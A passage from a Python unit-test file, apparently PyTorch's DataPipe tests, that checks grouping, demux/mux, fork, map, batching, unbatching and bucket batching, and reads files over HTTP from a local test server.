datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
def order_fn(data):
data.sort(key=lambda f: f[0], reverse=True)
return data
datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn) # type: ignore[var-annotated]
expected_result = [
("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
count = 0
for rec, expected in zip(datapipe5, expected_result):
count = count + 1
self.assertEqual(os.path.basename(rec[0][0]), expected[0])
self.assertEqual(os.path.basename(rec[1][0]), expected[1])
for i in [0, 1]:
self.assertEqual(rec[i][1].read(), b'12345abcde')
rec[i][1].close()
self.assertEqual(count, 8)
def test_demux_mux_datapipe(self):
numbers = NumbersDataset(10)
n1, n2 = numbers.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
numbers = NumbersDataset(10)
n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
n = n1.mux(n2, n3)
self.assertEqual(list(range(10)), list(n))
# Test Case: Uneven DataPipes
source_numbers = list(range(0, 10)) + [10, 12]
numbers_dp = IDP(source_numbers)
n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
n = n1.mux(n2)
self.assertEqual(source_numbers, list(n))
class TestDataFramesPipes(TestCase):
"""
Most of test will fail if pandas instaled, but no dill available.
Need to rework them to avoid multiple skips.
"""
def _get_datapipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3))
def _get_dataframes_pipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3)) \
._to_dataframes_pipe(
columns=['i', 'j'],
dataframe_size=dataframe_size)
@skipIfNoDataFrames
@skipIfNoDill # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
def test_capture(self):
dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
df_numbers = self._get_dataframes_pipe()
df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
self.assertEqual(list(dp_numbers), list(df_numbers))
@skipIfNoDataFrames
@skipIfNoDill
def test_shuffle(self):
# With non-zero (but extremely low) probability (when shuffle do nothing),
# this test fails, so feel free to restart
df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
dp_numbers = self._get_datapipe(range=1000)
df_result = [tuple(item) for item in df_numbers]
self.assertNotEqual(list(dp_numbers), df_result)
self.assertEqual(list(dp_numbers), sorted(df_result))
@skipIfNoDataFrames
@skipIfNoDill
def test_batch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8)
df_numbers_list = list(df_numbers)
last_batch = df_numbers_list[-1]
self.assertEqual(4, len(last_batch))
unpacked_batch = [tuple(row) for row in last_batch]
self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
@skipIfNoDataFrames
@skipIfNoDill
def test_unbatch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
dp_numbers = self._get_datapipe(range=100)
self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
@skipIfNoDataFrames
@skipIfNoDill
def test_filter(self):
df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, logfile=None, **kwargs):
self.__loggerHandle = None
if logfile is not None:
self.__loggerHandle = open(logfile, 'a+')
super().__init__(*args, **kwargs)
def log_message(self, format, *args):
if self.__loggerHandle is not None:
self.__loggerHandle.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
return
def finish(self):
if self.__loggerHandle is not None:
self.__loggerHandle.close()
super().finish()
def setUpLocalServerInThread():
try:
Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(("", 0), Handler)
server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# Wait a bit for the server to come up
time.sleep(3)
return (server_thread, server_addr, server)
except Exception:
raise
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
file_url_template):
furl_local_file = os.path.join(tmp_dir, "urls_list")
with open(furl_local_file, 'w') as fsum:
for i in range(0, file_count):
f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
write_chunk = 1024 * 1024 * 16
rmn_size = file_size
while rmn_size > 0:
with open(f, 'ab+') as fout:
fout.write(os.urandom(min(rmn_size, write_chunk)))
rmn_size = rmn_size - min(rmn_size, write_chunk)
fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
__server_thread: threading.Thread
__server_addr: str
__server: socketserver.TCPServer
@classmethod
def setUpClass(cls):
try:
(cls.__server_thread, cls.__server_addr,
cls.__server) = setUpLocalServerInThread()
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not set up due to {0}".format(str(e)))
@classmethod
def tearDownClass(cls):
try:
cls.__server.shutdown()
cls.__server_thread.join(timeout=15)
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not tear down (clean up temp directory or terminate\
local server) due to {0}".format(str(e)))
def _http_test_base(self, test_file_size, test_file_count, timeout=None,
chunk=None):
def _get_data_from_tuple_fn(data, *args, **kwargs):
return data[args[0]]
with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
# create tmp dir and files for test
base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
file_url_template = ("http://{server_addr}/{tmp_dir}/"
"/webfile_test_{num}.data\n")\
.format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
num='{num}')
create_temp_files_for_serving(tmpdir, test_file_count,
test_file_size, file_url_template)
datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
datapipe_line_url: IterDataPipe[str] = \
dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
datapipe_http = dp.iter.HttpReader(datapipe_line_url,
timeout=timeout)
datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
for (url, data) in datapipe_tob:
self.assertGreater(len(url), 0)
self.assertRegex(url, r'^http://.+\d+.data$')
if chunk is not None:
self.assertEqual(len(data), chunk)
else:
self.assertEqual(len(data), test_file_size)
@unittest.skip("Stress test on large amount of files skipped\
due to the CI timing constraint.")
def test_stress_http_reader_iterable_datapipes(self):
test_file_size = 10
# STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
# files locally
test_file_count = 1024
self._http_test_base(test_file_size, test_file_count)
@unittest.skip("Test on the very large file skipped\
due to the CI timing constraint.")
def test_large_files_http_reader_iterable_datapipes(self):
# STATS: It takes about 11 mins to test a large file of 64GB locally
test_file_size = 1024 * 1024 * 128
test_file_count = 1
timeout = 30
chunk = 1024 * 1024 * 8
self._http_test_base(test_file_size, test_file_count, timeout=timeout,
chunk=chunk)
class IDP_NoLen(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
def __iter__(self):
for i in self.input_dp:
yield i
class IDP(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
self.length = len(input_dp)
def __iter__(self):
for i in self.input_dp:
yield i
def __len__(self):
return self.length
class MDP(MapDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
self.length = len(input_dp)
def __getitem__(self, index):
return self.input_dp[index]
def __len__(self) -> int:
return self.length
def _fake_fn(data, *args, **kwargs):
return data
def _fake_filter_fn(data, *args, **kwargs):
return data >= 5
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, IDP(arr), (), {}),
(dp.iter.Mapper, IDP(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Collator, IDP(arr), (), {}),
(dp.iter.Collator, IDP(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Filter, IDP(arr), (_fake_filter_fn, (0, ), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, IDP(arr), (lambda x: x, ), {}),
(dp.iter.Collator, IDP(arr), (lambda x: x, ), {}),
(dp.iter.Filter, IDP(arr), (lambda x: x >= 5, ), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_concat_datapipe(self):
input_dp1 = IDP(range(10))
input_dp2 = IDP(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_fork_datapipe(self):
input_dp = IDP(range(10))
# Test Case: making sure all child DataPipe shares the same reference
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
# Test Case: one child DataPipe yields all value at a time
output1, output2, output3 = list(dp1), list(dp2), list(dp3)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: two child DataPipes yield value together
dp1, dp2 = input_dp.fork(num_instances=2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: one child DataPipe yields all value first, but buffer_size = 5 being too small
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
it1 = iter(dp1)
for _ in range(5):
next(it1)
with self.assertRaises(BufferError):
next(it1)
# Test Case: two child DataPipes yield value together with buffer size 1
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: make sure logic related to slowest_ptr is working properly
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 , output3 = [], [], []
for i, (n1, n2) in enumerate(zip(dp1, dp2)):
output1.append(n1)
output2.append(n2)
if i == 4: # yield all of dp3 when halfway through dp1, dp2
output3 = list(dp3)
break
self.assertEqual(list(range(5)), output1)
self.assertEqual(list(range(5)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: DataPipe doesn't reset if this pipe hasn't been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output2 = []
for i, n2 in enumerate(i2):
output2.append(n2)
if i == 4:
i1 = iter(dp1) # Doesn't reset because i1 hasn't been read
self.assertEqual(list(range(10)), output2)
# Test Case: DataPipe reset when some of it have been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output1, output2 = [], []
for i, (n1, n2) in enumerate(zip(i1, i2)):
output1.append(n1)
output2.append(n2)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset both all child DataPipe
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)) + list(range(10)), output1)
self.assertEqual(list(range(5)) + list(range(10)), output2)
# Test Case: DataPipe reset, even when some other child DataPipes are not read
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(10)), list(dp1)) # Resets even though dp3 has not been read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output3 = []
for i, n3 in enumerate(dp3):
output3.append(n3)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
output1 = list(dp1) # Resets even though dp3 is only partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)), output3)
self.assertEqual(list(range(10)), output1)
break
self.assertEqual(list(range(10)), list(dp3)) # dp3 has to read from the start again
# Test Case: Each DataPipe inherits the source datapipe's length
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertEqual(len(input_dp), len(dp1))
self.assertEqual(len(input_dp), len(dp2))
self.assertEqual(len(input_dp), len(dp3))
def test_demux_datapipe(self):
input_dp = IDP(range(10))
# Test Case: split into 2 DataPipes and output them one at a time
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(0, 10, 2)), output1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: split into 2 DataPipes and output them together
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
# Test Case: values of the same classification are lumped together, and buffer_size = 3 being too small
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
it1 = iter(dp1)
with self.assertRaises(BufferError):
next(it1) # Buffer raises because first 5 elements all belong to the a different child
# Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: classifer returns a value outside of [0, num_instance - 1]
dp = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
it = iter(dp[0])
with self.assertRaises(ValueError):
next(it)
next(it)
# Test Case: DataPipe doesn't reset when it has not been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
i1 = iter(dp1)
output2 = []
i = 0
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 4:
i1 = iter(dp1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset when some of it has been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = [], []
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
if n1 == 4:
break
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset, even when not all child DataPipes are exhausted
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1 = list(dp1)
self.assertEqual(list(range(0, 10, 2)), output1)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Reset even when dp2 is not read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output2 = []
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 1:
self.assertEqual(list(range(1, 5, 2)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Can reset even when dp2 is partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
break
output2 = list(dp2) # output2 has to read from beginning again
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: drop_none = True
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=True)
self.assertEqual([2, 4, 6, 8], list(dp1))
self.assertEqual([1, 3, 7, 9], list(dp2))
# Test Case: drop_none = False
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=False)
it1 = iter(dp1)
with self.assertRaises(ValueError):
next(it1)
# Test Case: __len__ not implemented
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
with self.assertRaises(TypeError):
len(dp1) # It is not implemented as we do not know length for each child in advance
with self.assertRaises(TypeError):
len(dp2)
@suppress_warnings # Suppress warning for lambda fn
def test_map_datapipe(self):
input_dp = IDP(range(10))
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
map_dp = input_dp.map(fn=fn, fn_args=(torch.int, ), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
input_dp_nl = IDP_NoLen(range(10))
map_dp_nl = input_dp_nl.map(lambda x: x)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(map_dp_nl)
for x, y in zip(map_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
@suppress_warnings # Suppress warning for lambda fn
def test_map_tuple_list_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
def _helper(ref_fn, fn, input_col=None, output_col=None):
for constr in (list, tuple):
datapipe = IDP([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
_helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
# The index of input column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 3)
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, 1)
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
_helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, 1)
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, [0, 1])
# Single-element list as output_col
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
# Replacing with one input column and single specified output column
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
_helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
# The index of output column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 1, 3)
_helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
_helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
# Appending the output at the end
_helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
_helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
_helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
_helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
@suppress_warnings # Suppress warning for lambda fn
def test_map_dict_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
# Prevent modification in-place to support resetting
def _dict_update(data, newdata, remove_idx=None):
_data = dict(data)
_data.update(newdata)
if remove_idx:
for idx in remove_idx:
del _data[idx]
return _data
def _helper(ref_fn, fn, input_col=None, output_col=None):
datapipe = IDP([{"x": 0, "y": 1, "z": 2},
{"x": 3, "y": 4, "z": 5},
{"x": 6, "y": 7, "z": 8}])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
_helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
# The key of input column is not in dict
with self.assertRaises(KeyError):
_helper(None, fn_1n, "a")
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, "y")
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
_helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, "x")
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, ["x", "y"])
# Single-element list as output_col
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
# Replacing with one input column and single specified output column
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
_helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
_helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
_helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
# Adding new key to dict for the output
_helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
_helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_map_datapipe_nested_level(self):
input_dp = IDP([list(range(10)) for _ in range(3)])
def fn(item, *, dtype=torch.float):
return torch.tensor(item, dtype=dtype)
with warnings.catch_warnings(record=True) as wa:
map_dp = input_dp.map(lambda ls: ls * 2, nesting_level=0)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, y * 2)
map_dp = input_dp.map(fn, nesting_level=1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=-1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=4)
with self.assertRaises(IndexError):
list(map_dp)
with self.assertRaises(ValueError):
input_dp.map(fn, nesting_level=-2)
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = IDP(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = IDP(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# Default not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
def test_unbatch_datapipe(self):
target_length = 6
prebatch_dp = IDP(range(target_length))
input_dp = prebatch_dp.batch(3)
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[0, 1, 2], [3, 4, 5]])
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
unbatch_dp = input_dp.unbatch()
expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
self.assertEqual(len(list(unbatch_dp)), 4)
for i, res in zip(expected_dp, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=2)
expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=-1)
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[0, 1, 2], [3, 4, 5]])
with self.assertRaises(ValueError):
unbatch_dp = input_dp.unbatch(unbatch_level=-2)
for i in unbatch_dp:
print(i)
with self.assertRaises(IndexError):
unbatch_dp = input_dp.unbatch(unbatch_level=5)
for i in unbatch_dp:
print(i)
def test_bucket_batch_datapipe(self):
input_dp = IDP(range(20))
with self.assertRaises(AssertionError):
dp.iter.BucketBatcher(input_dp, batch_size=0)
input_dp_nl = IDP_NoLen(range(20))
bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(bucket_dp_nl)
def _helper(**kwargs):
data_len = 100
arrs = list(range(data_len))
random.shuffle(arrs)
input_dp = IDP(arrs)
bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
def _verify_bucket_sorted(bucket):
# Sort batch in a bucket
bucket = sorted(bucket, key=lambda x: x[0])
flat = [item for batch in bucket for item in batch]
# Elements in the bucket should be sorted
self.assertEqual(flat, sorted(flat))
batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
bucket = []
for idx, d in enumerate(bucket_dp):
self.assertEqual(d, sorted(d))
bucket.append(d)
if idx % batch_num == batch_num - 1:
_verify_bucket_sorted(bucket)
bucket = []
_verify_bucket_sorted(bucket)
def _sort_fn(data):
return sorted(data)
# In-batch shuffle
_helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = IDP(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
